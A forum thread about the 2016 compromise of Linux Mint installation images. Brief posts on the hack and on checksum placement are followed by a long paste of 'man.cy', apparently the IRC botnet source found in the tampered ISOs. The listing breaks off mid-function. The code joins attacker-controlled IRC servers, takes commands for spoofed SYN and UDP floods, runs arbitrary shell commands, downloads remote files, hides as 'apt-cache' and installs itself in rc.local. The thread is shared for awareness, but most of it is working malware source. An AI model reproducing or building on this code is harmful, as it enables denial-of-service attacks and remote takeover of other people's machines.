Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Mint ISOs hacked and other stuff.

  • 25-02-2016 9:46pm
    #1
    Registered Users, Registered Users 2 Posts: 6,393 ✭✭✭


    Recent ISOs hacked and other stuff to pay attention to if you've been on the mint forums or downloaded recent ISO from their site.


Comments

  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    AnCatDubh wrote: »
    Recent ISOs hacked and other stuff to pay attention to if you've been on the mint forums or downloaded recent ISO from their site.

    I read an article about it online including a sort of interview with the hacker who did it. Apparently he found a flaw in the forum, got to the admin panel and was able to get from there fairly easily to the server hosting the images. I'll see if I can find the article, but one thing that surprised me was, he said, "The only way someone would know something was up was by checking the check-sum, but who checks those anyway?"

    I check them, mainly to be sure, Ive downloaded the full thing and nothing got lost in transit, which seems to happen from time to time, but I thought, if he had access to the server, why didnt he change the checksum file aswell?

    I always thought the checksum file should be located elsewhere. Even tweeted when the releases are published, so that a hacker cant change the checksum file once he has backdoored the images.


  • Registered Users, Registered Users 2 Posts: 9,605 ✭✭✭gctest50


    .

    man.cy was in the bad .isos
    man.cy from malicious Linux Mint iso
    man.cy
    #define STARTUP 1
    #undef IDENT // Only enable this if you absolutely have to
    #define FAKENAME "apt-cache" // What you want this to hide as
    #define CHAN "#mint" // Channel to join
    #define KEY "bleh" // The key of the channel
    int numservers=5; // Must change this to equal number of servers down there
    char *servers[] = {
    "updates.absentvodka.com",
    "updates.mintylinux.com",
    "eggstrawdinarry.mylittlerepo.com",
    "linuxmint.kernel-org.org",
    "updates.absentvodka.com",
    (void*)0
    };

    #include <stdarg.h>
    #include <errno.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>
    #include <strings.h>
    #include <netinet/in.h>
    #include <unistd.h>
    #include <sys/time.h>
    #include <sys/socket.h>
    #include <signal.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <time.h>
    #include <sys/wait.h>
    #include <sys/ioctl.h>
    int sock,changeservers=0;
    char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
    unsigned int *pids;
    unsigned long spoofs=0, spoofsm=0, numpids=0;
    int strwildmatch(const char* pattern, const char* string) {
    switch(*pattern) {
    case '\0': return *string;
    case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
    case '?': return !(*string && !strwildmatch(pattern+1, string+1));
    default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
    }
    }
    int Send(int sock, char *words, ...) {
    static char textBuffer[1024];
    va_list args;
    va_start(args, words);
    vsprintf(textBuffer, words, args);
    va_end(args);
    return write(sock,textBuffer,strlen(textBuffer));
    }
    int mfork(char *sender) {
    unsigned int parent, *newpids, i;
    if (disabled == 1) {
    Send(sock,"NOTICE %s :Unable to comply.\n",sender);
    return 1;
    }
    parent=fork();
    if (parent <= 0) return parent;
    numpids++;
    newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
    for (i=0;i<numpids-1;i++) newpids=pids;
    newpids[numpids-1]=parent;
    free(pids);
    pids=newpids;
    return parent;
    }
    unsigned long getspoof() {
    if (!spoofs) return rand();
    if (spoofsm == 1) return ntohl(spoofs);
    return ntohl(spoofs+(rand() % spoofsm)+1);
    }
    void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
    char *makestring() {
    char *tmp;
    int len=(rand()%5)+4,i;
    FILE *file;
    tmp=(char*)malloc(len+1);
    memset(tmp,0,len+1);
    if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp=(rand()%(91-65))+65;
    else {
    int a=((rand()*rand())%45402)+1;
    char buf[1024];
    for (i=0;i<a;i++) fgets(buf,1024,file);
    memset(buf,0,1024);
    fgets(buf,1024,file);
    filter(buf);
    memcpy(tmp,buf,len);
    fclose(file);
    }
    return tmp;
    }
    void identd() {
    int sockname,sockfd,sin_size,tmpsock,i;
    struct sockaddr_in my_addr,their_addr;
    char szBuffer[1024];
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(113);
    my_addr.sin_addr.s_addr = INADDR_ANY;
    memset(&(my_addr.sin_zero), 0, 8);
    if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
    if (listen(sockfd, 1) == -1) return;
    if (fork() == 0) return;
    sin_size = sizeof(struct sockaddr_in);
    if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
    for(;;) {
    fd_set bla;
    struct timeval timee;
    FD_ZERO(&bla);
    FD_SET(tmpsock,&bla);
    timee.tv_sec=timee.tv_usec=60;
    if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
    if (FD_ISSET(tmpsock,&bla)) break;
    }
    i = recv(tmpsock,szBuffer,1024,0);
    if (i <= 0 || i >= 20) exit(0);
    szBuffer=0;
    if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
    if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
    Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
    close(tmpsock);
    close(sockfd);
    exit(0);
    }
    long pow(long a, long b) {
    if (b == 0) return 1;
    if (b == 1) return a;
    return a*pow(a,b-1);
    }
    u_short in_cksum(u_short *addr, int len) {
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer =0;
    while (nleft > 1) {
    sum += *w++;
    nleft -= 2;
    }
    if (nleft == 1) {
    *(u_char *)(&answer) = *(u_char *)w;
    sum += answer;
    }
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
    }
    void get(int sock, char *sender, int argc, char **argv) {
    int sock2,i,d;
    struct sockaddr_in server;
    unsigned long ipaddr;
    char buf[1024];
    FILE *file;
    unsigned char bufm[4096];
    if (mfork(sender) != 0) return;
    if (argc < 2) {
    Send(sock,"NOTICE %s :GET <host> <save as>\n",sender);
    exit(0);
    }
    if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    Send(sock,"NOTICE %s :Unable to create socket.\n",sender);
    exit(0);
    }
    if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
    else strcpy(buf,argv[1]);
    for (i=0;i<strlen(buf) && buf != '/';i++);
    buf=0;
    server.sin_family = AF_INET;
    server.sin_port = htons(80);
    if ((ipaddr = inet_addr(buf)) == -1) {
    struct hostent *hostm;
    if ((hostm=gethostbyname(buf)) == NULL) {
    Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
    exit(0);
    }
    memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
    }
    else server.sin_addr.s_addr = ipaddr;
    memset(&(server.sin_zero), 0, 8);
    if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
    Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
    exit(0);
    }

    Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
    Send(sock,"NOTICE %s :Receiving file.\n",sender);
    file=fopen(argv[2],"wb");
    while(1) {
    int i;
    if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
    if (i < 4096) bufm=0;
    for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
    for (d+=4;d<i;d++) fputc(bufm[d],file);
    goto done;
    }
    }
    done:
    Send(sock,"NOTICE %s :Saved as %s\n",sender,argv[2]);
    while(1) {
    int i,d;
    if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
    if (i < 4096) bufm=0;
    for (d=0;d<i;d++) fputc(bufm[d],file);
    }
    fclose(file);
    close(sock2);
    exit(0);
    }
    void getspoofs(int sock, char *sender, int argc, char **argv) {
    unsigned long a=spoofs,b=spoofs+(spoofsm-1);
    if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
    else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
    }
    void version(int sock, char *sender, int argc, char **argv) {
    Send(sock,"NOTICE %s :Kaiten wa goraku\n",sender);
    }
    void nickc(int sock, char *sender, int argc, char **argv) {
    if (argc != 1) {
    Send(sock,"NOTICE %s :NICK <nick>\n",sender);
    return;
    }
    if (strlen(argv[1]) >= 10) {
    Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender);
    return;
    }
    Send(sock,"NICK %s\n",argv[1]);
    }
    void disable(int sock, char *sender, int argc, char **argv) {
    if (argc != 1) {
    Send(sock,"NOTICE %s :DISABLE <pass>\n",sender);
    Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
    return;
    }
    if (disabled) {
    Send(sock,"NOTICE %s :Already disabled.\n",sender);
    return;
    }
    if (strlen(argv[1]) > 254) {
    Send(sock,"NOTICE %s :Password too long! > 254\n",sender);
    return;
    }
    disabled=1;
    memset(dispass,0,256);
    strcpy(dispass,argv[1]);
    Send(sock,"NOTICE %s :Disable sucessful.\n");
    }
    void enable(int sock, char *sender, int argc, char **argv) {
    if (argc != 1) {
    Send(sock,"NOTICE %s :ENABLE <pass>\n",sender);
    Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
    return;
    }
    if (!disabled) {
    Send(sock,"NOTICE %s :Already enabled.\n",sender);
    return;
    }
    if (strcasecmp(dispass,argv[1])) {
    Send(sock,"NOTICE %s :Wrong password\n",sender);
    return;
    }
    disabled=0;
    Send(sock,"NOTICE %s :Password correct.\n",sender);
    }
    void spoof(int sock, char *sender, int argc, char **argv) {
    char ip[256];
    int i, num;
    unsigned long uip;
    if (argc != 1) {
    Send(sock,"NOTICE %s :Removed all spoofs\n",sender);
    spoofs=0;
    spoofsm=0;
    return;
    }
    if (strlen(argv[1]) > 16) {
    Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender);
    return;
    }
    strcpy(ip,argv[1]);
    if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
    for (i=0, num=1;i<strlen(ip);i++) if (ip == '.') num++;
    num=-(num-4);
    for (i=0;i<num;i++) strcat(ip,".0");
    uip=inet_network(ip);
    if (num == 0) spoofsm=1;
    else spoofsm=pow(256,num);
    spoofs=uip;
    }
    struct iphdr {
    unsigned int ihl:4, version:4;
    unsigned char tos;
    unsigned short tot_len;
    unsigned short id;
    unsigned short frag_off;
    unsigned char ttl;
    unsigned char protocol;
    unsigned short check;
    unsigned long saddr;
    unsigned long daddr;
    };
    struct udphdr {
    unsigned short source;
    unsigned short dest;
    unsigned short len;
    unsigned short check;
    };
    struct tcphdr {
    unsigned short source;
    unsigned short dest;
    unsigned long seq;
    unsigned long ack_seq;
    unsigned short res1:4, doff:4;
    unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
    unsigned short window;
    unsigned short check;
    unsigned short urg_ptr;
    };
    struct send_tcp {
    struct iphdr ip;
    struct tcphdr tcp;
    char buf[20];
    };
    struct pseudo_header {
    unsigned int source_address;
    unsigned int dest_address;
    unsigned char placeholder;
    unsigned char protocol;
    unsigned short tcp_length;
    struct tcphdr tcp;
    char buf[20];
    };
    unsigned int host2ip(char *sender,char *hostname) {
    static struct in_addr i;
    struct hostent *h;
    if((i.s_addr = inet_addr(hostname)) == -1) {
    if((h = gethostbyname(hostname)) == NULL) {
    Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
    exit(0);
    }
    bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
    }
    return i.s_addr;
    }
    void udp(int sock, char *sender, int argc, char **argv) {
    unsigned int port,i=0;
    unsigned long psize,target,secs;
    struct sockaddr_in s_in;
    struct iphdr *ip;
    struct udphdr *udp;
    char buf[1500],*str;
    int get;
    time_t start=time(NULL);
    if (mfork(sender) != 0) return;
    if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
    if (argc < 3) {
    Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender);
    exit(1);
    }
    target = host2ip(sender,argv[1]);
    port = atoi(argv[2]);
    secs = atol(argv[3]);
    ip=(void*)buf;
    udp=(void*)(buf+sizeof(struct iphdr));
    str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
    memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
    Send(sock,"NOTICE %s :Packeting %s.\n",sender,argv[1]);
    ip->ihl = 5;
    ip->version = 4;
    ip->tos = 0;
    ip->tot_len = 1500;
    ip->frag_off = 0;
    ip->protocol = 17;
    ip->ttl = 64;
    ip->daddr = target;
    udp->len = htons(psize);
    s_in.sin_family = AF_INET;
    s_in.sin_addr.s_addr = target;
    for (;;) {
    udp->source = rand();
    if (port) udp->dest = htons(port);
    else udp->dest = rand();
    udp->check = in_cksum((u_short *)buf,1500);
    ip->saddr = getspoof();
    ip->id = rand();
    ip->check = in_cksum((u_short *)buf,1500);
    s_in.sin_port = udp->dest;
    sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
    if (i >= 50) {
    if (time(NULL) >= start+secs) exit(0);
    i=0;
    }
    i++;
    }
    }
    void pan(int sock, char *sender, int argc, char **argv) {
    struct send_tcp send_tcp;
    struct pseudo_header pseudo_header;
    struct sockaddr_in sin;
    unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
    unsigned int psize=20, source, dest, check;
    unsigned long saddr, daddr,secs;
    int get;
    time_t start=time(NULL);
    if (mfork(sender) != 0) return;
    if (argc < 3) {
    Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender);
    exit(1);
    }
    if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
    {int i; for(i=0;i<20;i++) send_tcp.buf=(u_char)syn;}
    daddr=host2ip(sender,argv[1]);
    secs=atol(argv[3]);
    Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
    send_tcp.ip.ihl = 5;
    send_tcp.ip.version = 4;
    send_tcp.ip.tos = 16;
    send_tcp.ip.frag_off = 64;
    send_tcp.ip.ttl = 64;
    send_tcp.ip.protocol = 6;
    send_tcp.tcp.ack_seq = 0;
    send_tcp.tcp.doff = 10;
    send_tcp.tcp.res1 = 0;
    send_tcp.tcp.cwr = 0;
    send_tcp.tcp.ece = 0;
    send_tcp.tcp.urg = 0;
    send_tcp.tcp.ack = 0;
    send_tcp.tcp.psh = 0;
    send_tcp.tcp.rst = 0;
    send_tcp.tcp.fin = 0;
    send_tcp.tcp.syn = 1;
    send_tcp.tcp.window = 30845;
    send_tcp.tcp.urg_ptr = 0;
    dest=htons(atoi(argv[2]));
    while(1) {
    source=rand();
    if (atoi(argv[2]) == 0) dest=rand();
    saddr=getspoof();
    send_tcp.ip.tot_len = htons(40+psize);
    send_tcp.ip.id = rand();
    send_tcp.ip.saddr = saddr;
    send_tcp.ip.daddr = daddr;
    send_tcp.ip.check = 0;
    send_tcp.tcp.source = source;
    send_tcp.tcp.dest = dest;
    send_tcp.tcp.seq = rand();
    send_tcp.tcp.check = 0;
    sin.sin_family = AF_INET;
    sin.sin_port = dest;
    sin.sin_addr.s_addr = send_tcp.ip.daddr;
    send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
    check = rand();
    send_tcp.buf[9]=((char*)&check)[0];
    send_tcp.buf[10]=((char*)&check)[1];
    send_tcp.buf[11]=((char*)&check)[2];
    send_tcp.buf[12]=((char*)&check)[3];
    pseudo_header.source_address = send_tcp.ip.saddr;
    pseudo_header.dest_address = send_tcp.ip.daddr;
    pseudo_header.placeholder = 0;
    pseudo_header.protocol = IPPROTO_TCP;
    pseudo_header.tcp_length = htons(20+psize);
    bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
    bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
    send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
    sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
    if (a >= 50) {
    if (time(NULL) >= start+secs) exit(0);
    a=0;
    }
    a++;
    }
    close(get);
    exit(0);
    }
    void tsunami(int sock, char *sender, int argc, char **argv) {
    struct send_tcp send_tcp;
    struct pseudo_header pseudo_header;
    struct sockaddr_in sin;
    unsigned int psize=1400, check,i;
    unsigned long saddr, daddr,secs;
    int get;
    time_t start=time(NULL);
    if (mfork(sender) != 0) return;
    if (argc < 2) {
    Send(sock,"NOTICE %s :TSUNAMI <target> <secs>\n",sender);
    exit(1);
    }
    secs=atol(argv[2]);
    if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
    srand(time(NULL) ^ getpid());
    memset(send_tcp.buf,rand(),psize);
    daddr=host2ip(sender,argv[1]);
    Send(sock,"NOTICE %s :Tsunami heading for %s.\n",sender,argv[1]);
    while(1) {
    saddr=getspoof();
    send_tcp.ip.ihl = 5;
    send_tcp.ip.version = 4;
    send_tcp.ip.tos = 16;
    send_tcp.ip.tot_len = htons(40+psize);
    send_tcp.ip.id = rand();
    send_tcp.ip.frag_off = 64;
    send_tcp.ip.ttl = 64;
    send_tcp.ip.protocol = 6;
    send_tcp.ip.check = 0;
    send_tcp.ip.saddr = saddr;
    send_tcp.ip.daddr = daddr;
    send_tcp.tcp.source = rand();
    send_tcp.tcp.dest = rand();
    send_tcp.tcp.seq = rand();
    send_tcp.tcp.ack_seq = rand();
    send_tcp.tcp.doff = 5;
    send_tcp.tcp.res1 = 0;
    send_tcp.tcp.cwr = 0;
    send_tcp.tcp.ece = 0;
    send_tcp.tcp.urg = 0;
    send_tcp.tcp.ack = 1;
    send_tcp.tcp.psh = 1;
    send_tcp.tcp.rst = 0;
    send_tcp.tcp.fin = 0;
    send_tcp.tcp.syn = 0;
    send_tcp.tcp.window = 30845;
    send_tcp.tcp.check = 0;
    send_tcp.tcp.urg_ptr = 0;
    sin.sin_family = AF_INET;
    sin.sin_port = send_tcp.tcp.dest;
    sin.sin_addr.s_addr = send_tcp.ip.daddr;
    send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
    check = in_cksum((unsigned short *)&send_tcp, 40);
    pseudo_header.source_address = send_tcp.ip.saddr;
    pseudo_header.dest_address = send_tcp.ip.daddr;
    pseudo_header.placeholder = 0;
    pseudo_header.protocol = IPPROTO_TCP;
    pseudo_header.tcp_length = htons(20+psize);
    bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
    bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
    send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
    sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
    if (i >= 50) {
    if (time(NULL) >= start+secs) break;
    i=0;
    }
    i++;
    }
    close(get);
    exit(0);
    }
    void unknown(int sock, char *sender, int argc, char **argv) {
    int flag=1,fd,i;
    unsigned long secs;
    char *buf=(char*)malloc(9216);
    struct hostent *hp;
    struct sockaddr_in in;
    time_t start=time(NULL);
    if (mfork(sender) != 0) return;
    if (argc < 2) {
    Send(sock,"NOTICE %s :UNKNOWN <target> <secs>\n",sender);
    exit(1);
    }
    secs=atol(argv[2]);
    memset((void*)&in,0,sizeof(struct sockaddr_in));
    in.sin_addr.s_addr=host2ip(sender,argv[1]);
    in.sin_family = AF_INET;
    Send(sock,"NOTICE %s :Unknowning %s.\n",sender,argv[1]);
    while(1) {
    in.sin_port = rand();
    if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
    else {
    flag=1;
    ioctl(fd,FIONBIO,&flag);
    sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
    close(fd);
    }
    if (i >= 50) {
    if (time(NULL) >= start+secs) break;
    i=0;
    }
    i++;
    }
    close(fd);
    exit(0);
    }
    void move(int sock, char *sender, int argc, char **argv) {
    if (argc < 1) {
    Send(sock,"NOTICE %s :MOVE <server>\n",sender);
    exit(1);
    }
    server=strdup(argv[1]);
    changeservers=1;
    close(sock);
    }
    void help(int sock, char *sender, int argc, char **argv) {
    if (mfork(sender) != 0) return;
    Send(sock,"NOTICE %s :TSUNAMI <target> <secs> = Special packeter that wont be blocked by most firewalls\n",sender); sleep(2);
    Send(sock,"NOTICE %s :PAN <target> <port> <secs> = An advanced syn flooder that will kill most network drivers\n",sender); sleep(2);
    Send(sock,"NOTICE %s :UDP <target> <port> <secs> = A udp flooder\n",sender); sleep(2);
    Send(sock,"NOTICE %s :UNKNOWN <target> <secs> = Another non-spoof udp flooder\n",sender); sleep(2);

    Send(sock,"NOTICE %s :NICK <nick> = Changes the nick of the client\n",sender); sleep(2);
    Send(sock,"NOTICE %s :SERVER <server> = Changes servers\n",sender); sleep(2);
    Send(sock,"NOTICE %s :GETSPOOFS = Gets the current spoofing\n",sender); sleep(2);
    Send(sock,"NOTICE %s :SPOOFS <subnet> = Changes spoofing to a subnet\n",sender); sleep(2);

    Send(sock,"NOTICE %s :DISABLE = Disables all packeting from this client\n",sender); sleep(2);
    Send(sock,"NOTICE %s :ENABLE = Enables all packeting from this client\n",sender); sleep(2);

    Send(sock,"NOTICE %s :KILL = Kills the client\n",sender); sleep(2);
    Send(sock,"NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd\n",sender); sleep(2);
    Send(sock,"NOTICE %s :VERSION = Requests version of client\n",sender); sleep(2);
    Send(sock,"NOTICE %s :KILLALL = Kills all current packeting\n",sender); sleep(2);
    Send(sock,"NOTICE %s :HELP = Displays this\n",sender);

    Send(sock,"NOTICE %s :IRC <command> = Sends this command to the server\n",sender); sleep(2);
    Send(sock,"NOTICE %s :SH <command> = Executes a command\n",sender); sleep(2);
    exit(0);
    }
    void killall(int sock, char *sender, int argc, char **argv) {
    unsigned long i;
    for (i=0;i<numpids;i++) {
    if (pids != 0 && pids != getpid()) {
    if (sender) Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids);
    kill(pids,9);
    }
    }
    }
    void killd(int sock, char *sender, int argc, char **argv) {
    if (!disable) kill(0,9);
    else Send(sock,"NOTICE %s :Unable to comply.\n");
    }
    struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
    { "TSUNAMI", tsunami },
    { "PAN", pan },
    { "UDP", udp },
    { "UNKNOWN", unknown },

    { "NICK", nickc },
    { "SERVER", move },
    { "GETSPOOFS", getspoofs },
    { "SPOOFS", spoof },

    { "DISABLE", disable },
    { "ENABLE", enable },

    { "KILL", killd },
    { "GET", get },
    { "VERSION", version },
    { "KILLALL", killall },
    { "HELP", help },
    { (char *)0, (void (*)(int,char *,int,char **))0 } };
    void _PRIVMSG(int sock, char *sender, char *str) {
    int i;
    char *to, *message;
    for (i=0;i<strlen(str) && str != ' ';i++);
    str=0;
    to=str;
    message=str+i+2;
    for (i=0;i<strlen(sender) && sender != '!';i++);
    sender=0;
    if (*message == '!' && !strcasecmp(to,chan)) {
    char *params[12], name[1024]={0};
    int num_params=0, m;
    message++;
    for (i=0;i<strlen(message) && message != ' ';i++);
    message=0;
    if (strwildmatch(message,nick)) return;
    message+=i+1;
    if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock,"NOTICE %s :Unable to comply.\n",sender); else Send(sock,"%s\n",message+4);
    if (!strncmp(message,"SH ",3)) {
    char buf[1024];
    FILE *command;
    if (mfork(sender) != 0) return;
    memset(buf,0,1024);
    sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
    command=popen(buf,"r");
    while(!feof(command)) {
    memset(buf,0,1024);
    fgets(buf,1024,command);
    Send(sock,"NOTICE %s :%s\n",sender,buf);
    sleep(1);
    }
    pclose(command);
    exit(0);
    }
    m=strlen(message);
    for (i=0;i<m;i++) {
    if (*message == ' ' || *message == 0) break;
    name=*message;
    message++;
    }
    for (i=0;i<strlen(message);i++) if (message == ' ') num_params++;
    num_params++;
    if (num_params > 10) num_params=10;
    params[0]=name;
    params[num_params+1]="\0";
    m=1;
    while (*message != 0) {
    message++;
    if (m >= num_params) break;
    for (i=0;i<strlen(message) && message != ' ';i++);
    params[m]=(char*)malloc(i+1);
    strncpy(params[m],message,i);
    params[m]=0;
    m++;
    message+=i;
    }
    for (m=0; flooders[m].cmd != (char *)0; m++) {
    if (!strcasecmp(flooders[m].cmd,name)) {
    flooders[m].func(sock,sender,num_params-1,params);
    for (i=1;i<num_params;i++) free(params);
    return;
    }
    }
    }
    }
    void _376(int sock, char *sender, char *str) {
    Send(sock,"MODE %s -xi\n",nick);
    Send(sock,"JOIN %s :%s\n",chan,key);
    Send(sock,"WHO %s\n",nick);
    }
    void _PING(int sock, char *sender, char *str) {
    Send(sock,"PONG %s\n",str);
    }
    void _352(int sock, char *sender, char *str) {
    int i,d;
    char *msg=str;
    struct hostent *hostm;
    unsigned long m;
    for (i=0,d=0;d<5;d++) {
    for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
    if (i == strlen(str)) return;
    }
    for (i=0;i<strlen(msg) && msg != ' ';i++);
    msg=0;
    if (!strcasecmp(msg,nick) && !spoofsm) {
    msg=str;
    for (i=0,d=0;d<3;d++) {
    for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
    if (i == strlen(str)) return;
    }
    for (i=0;i<strlen(msg) && msg != ' ';i++);
    msg=0;
    if ((m = inet_addr(msg)) == -1) {
    if ((hostm=gethostbyname(msg)) == NULL) {
    Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
    return;
    }
    memcpy((char*)&m, hostm->h_addr, hostm->h_length);
    }
    ((char*)&spoofs)[3]=((char*)&m)[0];
    ((char*)&spoofs)[2]=((char*)&m)[1];
    ((char*)&spoofs)[1]=((char*)&m)[2];
    ((char*)&spoofs)[0]=0;
    spoofsm=256;
    }
    }
    void _433(int sock, char *sender, char *str) {
    free(nick);
    nick=makestring();
    }
    void _NICK(int sock, char *sender, char *str) {
    int i;
    for (i=0;i<strlen(sender) && sender != '!';i++);
    sender=0;
    if (!strcasecmp(sender,nick)) {
    if (*str == ':') str++;
    if (nick) free(nick);
    nick=strdup(str);
    }
    }
    struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
    { "352", _352 },
    { "376", _376 },
    { "433", _433 },
    { "422", _376 },
    { "PRIVMSG", _PRIVMSG },
    { "PING", _PING },
    { "NICK", _NICK },
    { (char *)0, (void (*)(int,char *,char *))0 } };
    void con() {
    struct sockaddr_in srv;
    unsigned long ipaddr,start;
    int flag;
    struct hostent *hp;
    start:
    sock=-1;
    flag=1;
    if (changeservers == 0) server=servers[rand()%numservers];
    changeservers=0;
    while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
    if (inet_addr(server) == 0 || inet_addr(server) == -1) {
    if ((hp = gethostbyname(server)) == NULL) {
    server=NULL;
    close(sock);
    goto start;
    }
    bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
    }
    else srv.sin_addr.s_addr=inet_addr(server);
    srv.sin_family = AF_INET;
    srv.sin_port = htons(6667);
    ioctl(sock,FIONBIO,&flag);
    start=time(NULL);
    while(time(NULL)-start < 10) {
    errno=0;
    if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
    setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
    setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
    setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
    return;
    }
    if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
    sleep(1);
    }
    server=NULL;
    close(sock);
    goto start;
    }
    int main(int argc, char **argv) {
    int on,i;
    char cwd[256],*str;
    FILE *file;
    #ifdef STARTUP
    str="/etc/rc.d/rc.local";
    file=fopen(str,"r");
    if (file == NULL) {
    str="/etc/rc.local";
    file=fopen(str,"r");
    }
    if (file != NULL) {
    char outfile[256], buf[1024];
    int i=strlen(argv[0]), d=0;
    getcwd(cwd,256);
    if (strcmp(cwd,"/")) {
    while(argv[0] != '/') i--;
    sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
    while(!feof(file)) {
    fgets(buf,1024,file);
    if (!strcasecmp(buf,outfile)) d++;
    }
    if (d == 0) {
    FILE *out;
    fclose(file);
